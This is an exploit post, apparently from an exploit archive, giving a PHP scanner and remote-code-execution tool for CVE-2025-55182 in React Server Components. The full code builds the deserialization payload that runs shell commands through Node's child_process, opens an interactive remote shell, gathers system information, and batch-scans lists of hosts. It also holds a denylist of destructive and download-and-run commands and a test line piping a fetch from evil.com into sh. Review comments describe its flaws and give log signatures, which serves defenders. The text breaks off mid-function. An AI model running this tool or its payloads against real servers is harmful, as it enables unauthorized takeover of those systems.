=============================================================================================================================================
| # Title : React 19.2.0 PHP Scanner & RCE Exploit Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://react.dev |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212444/ & CVE-2025-55182
[+] Summary : This project delivers a PHP-based vulnerability scanner and remote code execution (RCE) exploit for CVE‑2025‑55182 affecting React Server Components.
[+] includes:
Target scanning (single/multiple hosts)
Vulnerability detection
RCE payload execution
Interactive remote shell
Structured JSON parsing with fallback
Multipart form-data payload handling
The exploit relies on weaknesses in how React Server Components (RSC) deserialize request data to execute arbitrary commands on the server, and it checks the response to confirm that execution succeeded.
[+] POC :
<?php
/**
* by indoushka
*/
class CVE_2025_55182_Scanner_Secure {
// ANSI Color Codes with Windows fallback
private $colors = [];
private $user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
private $timeout = 10;
private $verify_ssl = false;
private $max_cmd_length = 200; // Maximum command length for safety
/**
* Set up terminal colours and relax TLS checking for later stream requests.
*
* NOTE(review): stream_context_set_default() replaces the process-wide default
* stream context, so peer and host-name verification are switched off for every
* later stream-wrapper HTTPS request in this process, not only for this class.
* Anything read over such a connection is unauthenticated and may have been
* altered in transit, which also applies to the responses this tool bases its
* verdicts on.
*/
public function __construct() {
// Initialize colors based on OS
$this->init_colors();
// Disables TLS peer and host-name verification (this does more than suppress warnings)
if (function_exists('stream_context_set_default')) {
stream_context_set_default([
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false,
]
]);
}
}
/**
 * Populate $this->colors with ANSI escape sequences, or with empty strings
 * when the terminal is not expected to render them.
 *
 * Non-Windows systems are assumed to support ANSI. On Windows, support is
 * only probed when running under the CLI SAPI.
 */
private function init_colors() {
    $palette = [
        'HEADER' => "\033[95m",
        'BLUE' => "\033[94m",
        'GREEN' => "\033[92m",
        'WARNING' => "\033[93m",
        'FAIL' => "\033[91m",
        'ENDC' => "\033[0m",
        'BOLD' => "\033[1m",
        'CYAN' => "\033[96m",
        'MAGENTA' => "\033[95m",
        'BG_RED' => "\033[41m"
    ];

    $on_windows = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';

    if (!$on_windows) {
        // Unix-like terminals are treated as ANSI-capable without probing.
        $ansi_ok = true;
    } elseif (PHP_SAPI === 'cli') {
        // Windows console: VT100 mode, or one of the known ANSI shims.
        $ansi_ok = (function_exists('sapi_windows_vt100_support') && sapi_windows_vt100_support(STDOUT))
            || getenv('ANSICON') !== false
            || getenv('ConEmuANSI') === 'ON'
            || getenv('TERM') === 'xterm';
    } else {
        $ansi_ok = false;
    }

    // Same keys either way, so color() lookups never miss.
    $this->colors = $ansi_ok
        ? $palette
        : array_fill_keys(array_keys($palette), '');
}
/**
 * Look up the escape sequence registered under $name.
 *
 * Returns an empty string when the name is unknown.
 */
private function color($name) {
    if (isset($this->colors[$name])) {
        return $this->colors[$name];
    }
    return '';
}
/** Write an informational line ("[*] ...") to standard output. */
private function print_info($msg) {
    $open = $this->color('BLUE');
    $close = $this->color('ENDC');
    echo "{$open}[*] {$msg}{$close}" . PHP_EOL;
}
/** Write a success line ("[+] ...") to standard output. */
private function print_success($msg) {
    echo sprintf('%s[+] %s%s', $this->color('GREEN'), $msg, $this->color('ENDC')) . PHP_EOL;
}
/** Write an error line ("[-] ...") to standard output. */
private function print_error($msg) {
    $parts = [$this->color('FAIL'), "[-] ", $msg, $this->color('ENDC'), PHP_EOL];
    echo implode('', $parts);
}
/** Write a warning line ("[!] ...") to standard output. */
private function print_warning($msg) {
    $open = $this->color('WARNING');
    $close = $this->color('ENDC');
    echo $open, "[!] ", $msg, $close, PHP_EOL;
}
/** Write a highlighted "[CRITICAL] ..." line to standard output. */
private function print_critical($msg) {
    $open = $this->color('BG_RED') . $this->color('BOLD');
    $close = $this->color('ENDC');
    echo "{$open}[CRITICAL] {$msg}{$close}" . PHP_EOL;
}
/**
* Pre-flight filter applied to a command string before it is sent.
*
* Returns false, after printing a message, when the command is longer than
* $this->max_cmd_length or when any regex in the list below matches; returns
* true otherwise.
*
* NOTE(review): this is a denylist of literal spellings over a free-form shell
* string. It narrows what an operator types by accident; it is not a control
* that limits what the tool can do to a target, and the "Secure" in the class
* name should not be read that way.
*/
private function validate_command($cmd) {
// Length is measured with strlen(), i.e. in bytes rather than characters
if (strlen($cmd) > $this->max_cmd_length) {
$this->print_error("Command too long (max {$this->max_cmd_length} characters)");
return false;
}
// Block potentially dangerous commands in interactive mode
$dangerous_patterns = [
'/\brm\s+-rf\b/i',
'/\bmkfs\b/i',
'/\bdd\s+if=/i',
'/\bchmod\s+777\b/i',
'/\bwget\b.*\|\s*sh/i',
'/\bcurl\b.*\|\s*sh/i',
'/;.*;/', // Multiple command separators
'/`.*`/', // Backticks
'/\$\s*\(/', // $() syntax
'/\|\s*\{/', // Pipe to block
];
// First matching pattern rejects the command; the message does not say which one
foreach ($dangerous_patterns as $pattern) {
if (preg_match($pattern, $cmd)) {
$this->print_warning("Potentially dangerous command detected and blocked");
return false;
}
}
return true;
}
/**
* Strip characters from a command string before it is placed in the payload.
*
* Two branches: commands starting with "echo" are reduced to word characters,
* whitespace, "-", "_" and "."; every other command is filtered against a much
* wider allow-list and then has runs of a repeated ";", "&" or "|" collapsed
* to a single character.
*
* NOTE(review): the wide allow-list in the second branch still admits shell
* metacharacters, so "sanitize" here means character filtering only. The
* returned string is still an arbitrary shell command.
*/
private function sanitize_command($cmd) {
// Basic sanitization for different command types
$cmd = trim($cmd);
// Handle echo commands specially - remove quotes if present
if (preg_match('/^echo\s+/i', $cmd)) {
// Extract the part after echo (assumes the prefix is exactly five bytes long)
$echo_content = substr($cmd, 5);
$echo_content = trim($echo_content, " \t\n\r\0\x0B\"'");
// Only allow safe characters for echo
$echo_content = preg_replace('/[^\w\d\s\-_\.]/', '', $echo_content);
return 'echo ' . $echo_content;
}
// For other commands, allow more characters but still sanitize
$cmd = preg_replace('/[^\w\d\s\-_\.\/\\\,:;&|><=\[\]{}()@#!~`\$\+\-\*"\'?]/', '', $cmd);
// Limit consecutive special characters
$cmd = preg_replace('/([;&|])\1+/', '$1', $cmd);
return $cmd;
}
/**
* Build the JSON document that is sent as the action field of the request.
*
* Four candidate structures are defined, each an "id" naming a module export
* and a "bound" array holding a JavaScript string with $cmd interpolated into
* it. Only the first candidate is ever returned; the other three are dead data.
*
* NOTE(review): the page does not show this payload shape succeeding against any
* deployment, so treat its effectiveness as unverified when weighing scan results.
*
* Defensive use: the strings below are what a request from this tool carries.
* A request body whose action field contains an "id" such as
* "vm#runInThisContext" together with a "bound" entry referencing
* child_process is a useful signature for WAF rules and for searching request
* logs. The durable fix is to upgrade React Server Components to the fixed
* release named in the vendor advisory for CVE-2025-55182.
*/
private function build_payload($cmd) {
// Multiple payload variations for different environments
$payloads = [
// Primary payload - standard Node.js RCE
[
"id" => "vm#runInThisContext",
"bound" => ["console.log('RCE_TEST'); process.mainModule.require('child_process').execSync('{$cmd}').toString()"]
],
// Alternative payload 1 - Different context
[
"id" => "vm#runInNewContext",
"bound" => ["global.process.mainModule.require('child_process').execSync('{$cmd}').toString()"]
],
// Alternative payload 2 - Using module constructor
[
"id" => "module#constructor",
"bound" => ["new module.constructor('return process')().mainModule.require('child_process').execSync('{$cmd}').toString()"]
],
// Alternative payload 3 - Direct require
[
"id" => "global#require",
"bound" => ["global.require('child_process').execSync('{$cmd}').toString()"]
]
];
// Only index 0 is used; nothing in this class selects another entry
return json_encode($payloads[0]);
}
/**
* Validate, filter and send one command to $url as a multipart POST.
*
* Returns an array with 'content', 'headers', 'status', 'success' and 'error',
* plus 'response_time' and 'payload_variant' on the normal path.
*
* NOTE(review): $payload_variant is only copied into the result; it is not
* passed to build_payload(), so every request carries the same payload.
* NOTE(review): the early return for a rejected command has no 'response_time'
* key, although scan() reads that key on failure.
*
* Defensive use: the request this method emits has a stable shape that can be
* matched in proxy, WAF and application logs: a multipart POST with exactly two
* parts named "$ACTION_REF_0" (value "1") and "$ACTION_0:0" (a JSON document),
* a boundary of "----WebKitFormBoundary" followed by 32 hex characters, the
* fixed User-Agent set on this class, "X-Requested-With: XMLHttpRequest",
* "Connection: close", and an Origin header derived from the target URL itself.
*/
private function send_payload($url, $cmd, $payload_variant = 0) {
// Validate command first
if (!$this->validate_command($cmd)) {
return [
'content' => null,
'headers' => [],
'status' => 0,
'success' => false,
'error' => 'Command validation failed'
];
}
// Sanitize command
$safe_cmd = $this->sanitize_command($cmd);
// Build payload (the variant argument is not consulted here)
$payload = $this->build_payload($safe_cmd);
// Prepare multipart form data
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
$content = "--{$boundary}\r\n";
$content .= "Content-Disposition: form-data; name=\"\$ACTION_REF_0\"\r\n\r\n1\r\n";
$content .= "--{$boundary}\r\n";
$content .= "Content-Disposition: form-data; name=\"\$ACTION_0:0\"\r\n\r\n";
$content .= $payload . "\r\n";
$content .= "--{$boundary}--\r\n";
$headers = [
"Content-Type: multipart/form-data; boundary={$boundary}",
"User-Agent: {$this->user_agent}",
"Accept: */*",
"Connection: close",
"X-Requested-With: XMLHttpRequest",
"Origin: " . parse_url($url, PHP_URL_SCHEME) . "://" . parse_url($url, PHP_URL_HOST)
];
// ignore_errors makes 4xx/5xx bodies readable instead of failing the call;
// TLS verification follows $this->verify_ssl, which this class sets to false
$context = stream_context_create([
'http' => [
'method' => 'POST',
'header' => implode("\r\n", $headers),
'content' => $content,
'timeout' => $this->timeout,
'ignore_errors' => true
],
'ssl' => [
'verify_peer' => $this->verify_ssl,
'verify_peer_name' => $this->verify_ssl
]
]);
try {
$start_time = microtime(true);
// "@" hides the warning; failure is reported through the false return value
$response = @file_get_contents($url, false, $context);
$response_time = round((microtime(true) - $start_time) * 1000, 2);
// The HTTP wrapper fills $http_response_header in this scope after the call
$http_response_header = $http_response_header ?? [];
return [
'content' => $response,
'headers' => $http_response_header,
'status' => $this->get_http_status($http_response_header),
'success' => $response !== false,
'response_time' => $response_time,
'payload_variant' => $payload_variant,
'error' => $response === false ? error_get_last()['message'] ?? 'Unknown error' : null
];
} catch (Exception $e) {
$this->print_error("Connection error: " . $e->getMessage());
return [
'content' => null,
'headers' => [],
'status' => 0,
'success' => false,
'response_time' => 0,
'error' => $e->getMessage()
];
}
}
/**
 * Pull the numeric status code out of the first response header line.
 *
 * Returns 0 when there are no headers or the first line is not an
 * "HTTP/x.y NNN" status line.
 */
private function get_http_status($headers) {
    if (empty($headers)) {
        return 0;
    }

    $found = [];
    preg_match('/HTTP\/\d\.\d\s+(\d+)/', $headers[0], $found);

    if (!isset($found[1])) {
        return 0;
    }
    return (int)$found[1];
}
/**
 * Produce a random alphanumeric marker of $length characters.
 *
 * Characters are drawn with random_int() from a-z, A-Z and 0-9.
 */
private function generate_token($length = 16) {
    $alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $last_index = strlen($alphabet) - 1;

    $marker = '';
    while (strlen($marker) < $length) {
        $marker .= $alphabet[random_int(0, $last_index)];
    }
    return $marker;
}
/**
* Interpret a response body using three heuristics, applied in order.
*
* 1. Decode the body as JSON and copy its "result", "error" and "message" keys.
* 2. If a token was supplied, search the raw body for it and, when no result
*    has been set yet, keep up to 100 bytes either side as the result.
* 3. If there is still no result, take the first match of a few regexes for
*    result/output/data fields or <pre>/<code> elements.
*
* Returns an array with 'type', 'result', 'error', 'token_found', 'json_valid'
* and 'raw_preview', plus 'full_json' when the body decoded as JSON.
*
* NOTE(review): 'token_found' means only that the token occurs somewhere in the
* body. The token is sent in the request, so a server that reflects request
* data (for example in an error page) sets this flag without having executed
* anything. Step 3 matches generic field names and markup and is equally prone
* to false positives.
*/
private function extract_result_from_response($content, $token = null) {
$result = [
'type' => 'unknown',
'result' => null,
'error' => null,
'token_found' => false,
'json_valid' => false,
'raw_preview' => substr($content, 0, 200) . (strlen($content) > 200 ? '...' : '')
];
// Method 1: Try JSON parsing first
if (!empty($content)) {
$json_data = @json_decode($content, true);
if (json_last_error() === JSON_ERROR_NONE) {
$result['json_valid'] = true;
$result['type'] = 'json';
$result['full_json'] = $json_data;
if (isset($json_data['result'])) {
$result['result'] = $json_data['result'];
}
if (isset($json_data['error'])) {
$result['error'] = $json_data['error'];
}
// When both keys are present, "message" overwrites "error"
if (isset($json_data['message'])) {
$result['error'] = $json_data['message'];
}
}
}
// Method 2: Look for token in raw response
if ($token !== null && !empty($content)) {
if (strpos($content, $token) !== false) {
$result['token_found'] = true;
$result['type'] = $result['type'] === 'unknown' ? 'raw' : $result['type'];
// Extract context around token (first occurrence, 100 bytes before and after its start)
$pos = strpos($content, $token);
$start = max(0, $pos - 100);
$end = min(strlen($content), $pos + 100);
$context = substr($content, $start, $end - $start);
if (empty($result['result'])) {
$result['result'] = $context;
}
}
}
// Method 3: Try to extract from common patterns
if (empty($result['result']) && !empty($content)) {
$patterns = [
'/result["\']?\s*:\s*["\']?([^"\',}]+)/i',
'/output["\']?\s*:\s*["\']?([^"\',}]+)/i',
'/data["\']?\s*:\s*["\']?([^"\',}]+)/i',
'/<pre[^>]*>([^<]+)<\/pre>/i',
'/<code[^>]*>([^<]+)<\/code>/i'
];
// First pattern that matches wins
foreach ($patterns as $pattern) {
if (preg_match($pattern, $content, $matches)) {
$result['result'] = trim($matches[1]);
$result['type'] = 'pattern';
break;
}
}
}
return $result;
}
/**
* Probe one URL and classify the response.
*
* Sends "echo <random token>" through send_payload() and interprets the reply
* with extract_result_from_response(). Returns false when the request failed,
* otherwise ['vulnerable' => bool, 'confidence' => 'high'|'medium'|'low'|'none'].
*
* NOTE(review): the probe is itself a command-execution attempt, not a passive
* version check. A "scan" therefore leaves the same request trail on the target
* as the exploit path, and with $detailed set a positive verdict is followed by
* four further commands.
* NOTE(review): the verdict is heuristic in both directions. "medium" needs only
* the token anywhere in the body, which a server reflecting request data also
* produces; "low" needs only one of four common words in the extracted text; a
* negative says only that this one payload shape produced no match. Patch
* status is better established from the deployed package versions.
* NOTE(review): the failure path returns false while callers index the result
* as an array, so unreachable targets are handled as "not vulnerable".
*/
public function scan($url, $detailed = false) {
$this->print_info("Scanning {$url} for CVE-2025-55182...");
$token = $this->generate_token(16);
$cmd = "echo " . $token; // No quotes needed for echo
$response = $this->send_payload($url, $cmd);
if (!$response['success'] || $response['content'] === null) {
$this->print_error("Failed to connect to target.");
$this->print_info("Error: " . ($response['error'] ?? 'Unknown'));
$this->print_info("Response time: {$response['response_time']}ms");
return false;
}
$content = $response['content'];
$analysis = $this->extract_result_from_response($content, $token);
if ($detailed) {
$this->print_info("=== Detailed Analysis ===");
$this->print_info("Response type: " . $analysis['type']);
$this->print_info("HTTP Status: " . $response['status']);
$this->print_info("Response time: {$response['response_time']}ms");
$this->print_info("JSON valid: " . ($analysis['json_valid'] ? 'Yes' : 'No'));
$this->print_info("Token found: " . ($analysis['token_found'] ? 'Yes' : 'No'));
if ($analysis['error']) {
$this->print_warning("Server error: " . $analysis['error']);
}
}
// Check for vulnerability
$is_vulnerable = false;
$confidence = 'low';
// High confidence: Token found in JSON result
if ($analysis['type'] === 'json' && $analysis['result'] && strpos($analysis['result'], $token) !== false) {
$is_vulnerable = true;
$confidence = 'high';
$this->print_success("HIGH CONFIDENCE: Token found in JSON result");
}
// Medium confidence: Token found in raw response
elseif ($analysis['token_found']) {
$is_vulnerable = true;
$confidence = 'medium';
$this->print_success("MEDIUM CONFIDENCE: Token found in raw response");
}
// Low confidence: Response looks like RCE output but no token
elseif ($analysis['result'] && preg_match('/\b(root|admin|www-data|user)\b/i', $analysis['result'])) {
$is_vulnerable = true;
$confidence = 'low';
$this->print_warning("LOW CONFIDENCE: RCE-like output detected");
}
if ($is_vulnerable) {
$this->print_success("Target appears to be VULNERABLE (confidence: {$confidence})!");
if ($analysis['result']) {
$output = trim($analysis['result']);
$output_preview = strlen($output) > 100 ? substr($output, 0, 100) . '...' : $output;
$this->print_info("Output preview: " . $output_preview);
}
// Try to get more info if detailed scan
if ($detailed) {
$this->print_info("Gathering system information...");
$info_cmds = [
'whoami' => 'Current user',
'uname -a || ver' => 'System info',
'pwd' => 'Current directory',
'id || whoami /all' => 'User details'
];
foreach ($info_cmds as $cmd => $desc) {
$resp = $this->send_payload($url, $cmd);
if ($resp['success'] && $resp['content']) {
// No token is passed here, so only the JSON and pattern heuristics apply
$info = $this->extract_result_from_response($resp['content']);
if ($info['result']) {
$clean_result = trim(preg_replace('/\s+/', ' ', $info['result']));
$this->print_info("{$desc}: " . substr($clean_result, 0, 80));
}
}
usleep(50000); // 50ms delay
}
}
return ['vulnerable' => true, 'confidence' => $confidence];
} else {
$this->print_warning("Target does not appear to be vulnerable.");
if ($detailed) {
$this->print_info("Response preview: " . $analysis['raw_preview']);
}
return ['vulnerable' => false, 'confidence' => 'none'];
}
}
public function exploit($url) {
$this->print_critical("=== EXPLOIT MODE ACTIVATED ===");
$this->print_warning("You are about to exploit a vulnerable system.");
$this->print_warning("Make sure you have proper authorization!");
// Initial scan with details
$scan_result = $this->scan($url, true);
if (!$scan_result['vulnerable']) {
$this->print_error("Target is not vulnerable or confidence is too low.");
$this->print_info("Would you like to proceed anyway? (yes/no): ");
$response = trim(fgets(STDIN));
if (strtolower($response) !== 'yes') {
$this->print_info("Exploit cancelled.");
return;
}
$this->print_warning("Proceeding with low-confidence target...");
}
$this->print_success("Starting interactive shell on {$url}");
$this->print_info("Type 'help' for available commands, 'exit' to quit.");
// Get initial system info
$sysinfo = $this->get_system_info($url);
$user = $sysinfo['user'] ?? 'unknown';
$hostname = $sysinfo['hostname'] ?? 'unknown';
$platform = $sysinfo['platform'] ?? 'unknown';
// Interactive shell loop
$command_history = [];
while (true) {
// Build prompt with colors
$prompt = $this->color('GREEN') . $user . "@" . $hostname . $this->color('ENDC') .
" [" . $this->color('CYAN') . $platform . $this->color('ENDC') . "] " .
$this->color('BLUE') . $this->color('BOLD') . "> " . $this->color('ENDC');
echo $prompt;
// Get command input
if (function_exists('readline')) {
readline_completion_function(function($input, $index) {
$commands = ['help', 'exit', 'clear', 'sysinfo', 'history', 'pwd', 'ls', 'cd', 'cat', 'whoami', 'id'];
return array_filter($commands, function($cmd) use ($input) {
return stripos($cmd, $input) === 0;
});
});
$cmd = readline();
if ($cmd !== '') {
readline_add_history($cmd);
$command_history[] = $cmd;
}
} else {
$cmd = trim(fgets(STDIN));
if (!empty($cmd)) {
$command_history[] = $cmd;
}
}
// Handle exit
if (strtolower($cmd) === 'exit' || strtolower($cmd) === 'quit') {
$this->print_info("Exiting interactive shell...");
break;
}
// Handle empty command
if (empty($cmd)) {
continue;
}
// Handle special commands
switch (strtolower($cmd)) {
case 'help':
$this->show_help();
continue 2;
case 'clear':
case 'cls':
system(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' ? 'cls' : 'clear');
continue 2;
case 'history':
$this->show_history($command_history);
continue 2;
case 'sysinfo':
$this->show_sysinfo($url);
continue 2;
case 'safe':
$this->print_info("Safe mode enabled - blocking dangerous commands");
$this->print_info("Current restrictions: rm, mkfs, dd, chmod 777, wget|sh, curl|sh");
continue 2;
}
// Validate command length
if (strlen($cmd) > $this->max_cmd_length) {
$this->print_error("Command too long (max {$this->max_cmd_length} characters)");
$this->print_info("Tip: Use redirects or split complex commands");
continue;
}
// Execute command
$start_time = microtime(true);
$response = $this->send_payload($url, $cmd);
$exec_time = round((microtime(true) - $start_time) * 1000, 2);
if ($response['success'] && $response['content']) {
$analysis = $this->extract_result_from_response($response['content']);
if ($analysis['result']) {
echo trim($analysis['result']) . PHP_EOL;
$this->print_info("Execution time: {$exec_time}ms | HTTP: {$response['status']}");
} elseif ($analysis['error']) {
$this->print_error("Server error: " . $analysis['error']);
} else {
$this->print_warning("Command executed but no output returned.");
$this->print_info("Response type: " . $analysis['type']);
}
} else {
$this->print_error("Command failed or no response.");
$this->print_info("Status: {$response['status']} | Time: {$response['response_time']}ms");
if ($response['error']) {
$this->print_info("Error: " . $response['error']);
}
}
// Small delay to avoid overwhelming the target
usleep(100000); // 100ms
}
$this->print_info("Session ended. Total commands executed: " . count($command_history));
}
private function get_system_info($url) {
$info = [
'user' => 'unknown',
'hostname' => 'unknown',
'platform' => 'unknown'
];
// Try multiple commands to get info
$commands = [
'whoami' => 'user',
'hostname || hostname' => 'hostname',
'uname -s -r -m || ver || systeminfo | findstr /B /C:"OS"' => 'platform'
];
foreach ($commands as $cmd => $key) {
$resp = $this->send_payload($url, $cmd);
if ($resp['success'] && $resp['content']) {
$analysis = $this->extract_result_from_response($resp['content']);
if ($analysis['result']) {
$info[$key] = trim($analysis['result']);
}
}
usleep(50000); // 50ms delay
}
return $info;
}
private function show_help() {
$help = [
'Basic Commands:' => [
'help' => 'Show this help message',
'exit, quit' => 'Exit the interactive shell',
'clear, cls' => 'Clear the terminal screen',
'history' => 'Show command history',
'sysinfo' => 'Display detailed system information',
'safe' => 'Show safe mode restrictions'
],
'File Operations:' => [
'pwd' => 'Print working directory',
'ls, ls -la, dir' => 'List directory contents',
'cat <file>' => 'View file contents',
'cd <dir>' => 'Change directory (note: may not persist)'
],
'System Info:' => [
'whoami' => 'Current user',
'id' => 'User ID and groups',
'uname -a' => 'System information',
'ps aux' => 'Running processes',
'netstat -an' => 'Network connections'
],
'Tips:' => [
'Command chaining' => 'Use && for sequential commands',
'Output redirection' => 'Use > to save output to file',
'Pipes' => 'Use | to chain commands',
'Background jobs' => 'Use & to run in background'
]
];
foreach ($help as $section => $commands) {
$this->print_info("\n{$section}");
foreach ($commands as $cmd => $desc) {
echo " " . str_pad($cmd, 25) . " - " . $desc . PHP_EOL;
}
}
}
/**
 * Print the commands entered so far, numbered from 1.
 */
private function show_history($history) {
    if (empty($history)) {
        $this->print_info("No command history yet.");
        return;
    }

    $this->print_info("Command History:");
    foreach ($history as $index => $cmd) {
        $number = $index + 1;
        echo " [{$number}] {$cmd}" . PHP_EOL;
    }
}
private function show_sysinfo($url) {
$this->print_info("Gathering detailed system information...");
$checks = [
'System' => 'uname -a || ver',
'Kernel' => 'cat /proc/version 2>/dev/null || systeminfo | findstr /B /C:"OS"',
'CPU' => 'cat /proc/cpuinfo 2>/dev/null || wmic cpu get name',
'Memory' => 'free -h 2>/dev/null || wmic memorychip get capacity',
'Disk' => 'df -h 2>/dev/null || wmic logicaldisk get size,freespace,caption',
'Network' => 'ifconfig 2>/dev/null || ipconfig /all',
'Users' => 'who 2>/dev/null || query user',
'Processes' => 'ps aux | head -20 2>/dev/null || tasklist',
'Environment' => 'env 2>/dev/null || set',
'Packages' => 'dpkg -l 2>/dev/null || rpm -qa 2>/dev/null || pacman -Q'
];
foreach ($checks as $name => $cmd) {
$resp = $this->send_payload($url, $cmd);
if ($resp['success'] && $resp['content']) {
$analysis = $this->extract_result_from_response($resp['content']);
if ($analysis['result']) {
$output = trim($analysis['result']);
$preview = substr($output, 0, 100);
$this->print_info("{$name}: " . $preview . (strlen($output) > 100 ? '...' : ''));
}
}
usleep(100000); // 100ms delay
}
}
/**
* Run scan() over every non-empty line of a file and summarise the verdicts.
*
* Prints progress and a per-category count, optionally writes a text report to
* the current working directory, and returns the URLs grouped by category.
* Returns nothing when the file is missing or empty.
*
* NOTE(review): scan() returns false when a target could not be reached, and
* the truthiness test below sends that case to 'not_vulnerable'. The 'errors'
* bucket is filled only from a caught Exception. The "Not Vulnerable" list in
* the report therefore mixes unreachable hosts with hosts that answered, and
* must not be used as evidence that a system is patched.
* NOTE(review): the report file name is built from the current time and the
* file is written with default permissions; it lists every target by verdict.
*/
public function batch_scan($file_path, $output_report = true) {
if (!file_exists($file_path)) {
$this->print_error("File not found: {$file_path}");
return;
}
$urls = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if (!$urls) {
$this->print_error("No URLs found in file.");
return;
}
$this->print_info("Loaded " . count($urls) . " URLs from {$file_path}");
$this->print_warning("Batch scan starting. This may take a while...");
$results = [
'high_confidence' => [],
'medium_confidence' => [],
'low_confidence' => [],
'not_vulnerable' => [],
'errors' => []
];
$start_time = time();
foreach ($urls as $index => $url) {
$url = trim($url);
if (empty($url)) continue;
$current = $index + 1;
$total = count($urls);
$percent = round(($current / $total) * 100, 1);
$elapsed = time() - $start_time;
// ETA extrapolates from the average time per target so far
$eta = $total > 0 ? round(($elapsed / $current) * ($total - $current)) : 0;
$this->print_info("Scanning [{$current}/{$total}] ({$percent}%) ETA: {$eta}s - {$url}");
try {
$result = $this->scan($url, false);
// $result is false on a failed request; that falls through to the else branch
if ($result['vulnerable']) {
switch ($result['confidence']) {
case 'high':
$results['high_confidence'][] = $url;
break;
case 'medium':
$results['medium_confidence'][] = $url;
break;
case 'low':
$results['low_confidence'][] = $url;
break;
}
} else {
$results['not_vulnerable'][] = $url;
}
} catch (Exception $e) {
$results['errors'][] = $url . " - " . $e->getMessage();
}
// Progress delay
usleep(300000); // 300ms
}
// Generate report
$this->print_info("\n" . str_repeat("=", 60));
$this->print_info("BATCH SCAN COMPLETE");
$this->print_info("Total time: " . (time() - $start_time) . " seconds");
$this->print_info(str_repeat("-", 60));
$categories = [
'high_confidence' => ['High Confidence Vulnerable', $this->color('GREEN')],
'medium_confidence' => ['Medium Confidence Vulnerable', $this->color('WARNING')],
'low_confidence' => ['Low Confidence Vulnerable', $this->color('CYAN')],
'not_vulnerable' => ['Not Vulnerable', $this->color('FAIL')],
'errors' => ['Errors', $this->color('FAIL')]
];
foreach ($categories as $key => [$label, $color]) {
$count = count($results[$key]);
echo $color . "[*] " . str_pad($label, 30) . ": " . $count . $this->color('ENDC') . PHP_EOL;
}
// Save report if requested
if ($output_report) {
$report_file = 'cve_scan_report_' . date('Y-m-d_H-i-s') . '.txt';
$report_content = "CVE-2025-55182 Scan Report\n";
$report_content .= "Generated: " . date('Y-m-d H:i:s') . "\n";
$report_content .= "Total URLs: " . count($urls) . "\n\n";
foreach ($categories as $key => [$label, $color]) {
$report_content .= "\n=== {$label} ===\n";
foreach ($results[$key] as $item) {
$report_content .= $item . "\n";
}
}
// Return value is not checked, so a failed write is still reported as saved
file_put_contents($report_file, $report_content);
$this->print_success("Detailed report saved to: {$report_file}");
}
return $results;
}
private function print_banner() {
$banner = $this->color('HEADER') . $this->color('BOLD') . "
╔══════════════════════════════════════════════════════════╗
║ CVE-2025-55182 Scanner & Exploit Tool ║
║ React Server Components RCE Vulnerability ║
╚══════════════════════════════════════════════════════════╝" . $this->color('ENDC') . "
" . $this->color('CYAN') . "[*] Features:" . $this->color('ENDC') . "
• Multi-payload support for different environments
• Command validation and sanitization
• Confidence-based vulnerability detection
• Interactive shell with command history
• Batch scanning with detailed reporting
• Safe mode to prevent dangerous commands
" . $this->color('WARNING') . "[!] SECURITY WARNING:" . $this->color('ENDC') . "
• This tool is for AUTHORIZED security testing ONLY
• Unauthorized use is ILLEGAL and UNETHICAL
• Use only on systems you OWN or have PERMISSION to test
" . $this->color('FAIL') . $this->color('BOLD') . "[!] LEGAL NOTICE: You are responsible for your actions!" . $this->color('ENDC') . "
";
echo $banner . PHP_EOL;
}
/**
 * Command-line entry point: print the banner, then dispatch on $argv[1].
 *
 * Exits with status 1 when not run under the CLI SAPI, when no mode is
 * given, or when the mode is unknown.
 */
public function run() {
    $this->print_banner();

    if (PHP_SAPI !== 'cli') {
        $this->print_error("This tool must be run from command line.");
        echo "For web interface, use the separate web version." . PHP_EOL;
        exit(1);
    }

    global $argv;
    if (count($argv) < 2) {
        $this->show_help();
        exit(1);
    }

    $mode = $argv[1];
    $flag = $argv[2] ?? null;
    $has_value = isset($argv[3]);

    if ($mode === 'scan') {
        if ($flag === '-u' && $has_value) {
            $this->scan($argv[3], true);
        } elseif ($flag === '-f' && $has_value) {
            $this->batch_scan($argv[3]);
        } else {
            $this->show_help();
        }
        return;
    }

    if ($mode === 'exploit') {
        if ($flag === '-u' && $has_value) {
            $this->exploit($argv[3]);
        } else {
            $this->show_help();
        }
        return;
    }

    if ($mode === 'test') {
        $this->test_mode();
        return;
    }

    if (in_array($mode, ['help', '--help', '-h'], true)) {
        $this->show_help();
        return;
    }

    // Anything else is rejected with usage text and a non-zero exit status.
    $this->print_error("Unknown mode: {$mode}");
    $this->show_help();
    exit(1);
}
/**
* Local self-test: exercises token generation, validate_command(),
* build_payload() and the presence of a few built-in functions.
*
* Nothing here contacts a target. The validation cases check only that the
* sample strings are accepted or rejected as listed, and the payload check
* only that build_payload() returns text that decodes as JSON. Neither says
* anything about whether a scan verdict is reliable.
*/
private function test_mode() {
$this->print_info("Running comprehensive self-test...");
// Test token generation
$token = $this->generate_token(10);
$this->print_success("Token generation: OK ({$token})");
// Test command validation (key = sample command, value = expected verdict)
$test_cmds = [
'echo test' => true,
'whoami' => true,
'ls -la' => true,
str_repeat('a', 201) => false, // Too long
'rm -rf /' => false, // Dangerous
'wget http://evil.com | sh' => false // Dangerous pattern
];
foreach ($test_cmds as $cmd => $expected) {
$result = $this->validate_command($cmd);
$status = $result === $expected ? 'OK' : 'FAIL';
$color = $result === $expected ? 'GREEN' : 'FAIL';
echo $this->color($color) . "[TEST] Command validation '{$cmd}': {$status}" . $this->color('ENDC') . PHP_EOL;
}
// Test payload building (the decoded value is not inspected, only the decode status)
$payload = $this->build_payload('test');
$json_test = json_decode($payload, true);
$this->print_success("Payload building: " . (json_last_error() === JSON_ERROR_NONE ? 'OK' : 'FAIL'));
// Test required functions
$required = ['json_encode', 'file_get_contents', 'random_bytes', 'preg_match'];
$all_ok = true;
foreach ($required as $func) {
if (!function_exists($func)) {
$this->print_error("Missing function: {$func}");
$all_ok = false;
}
}
if ($all_ok) {
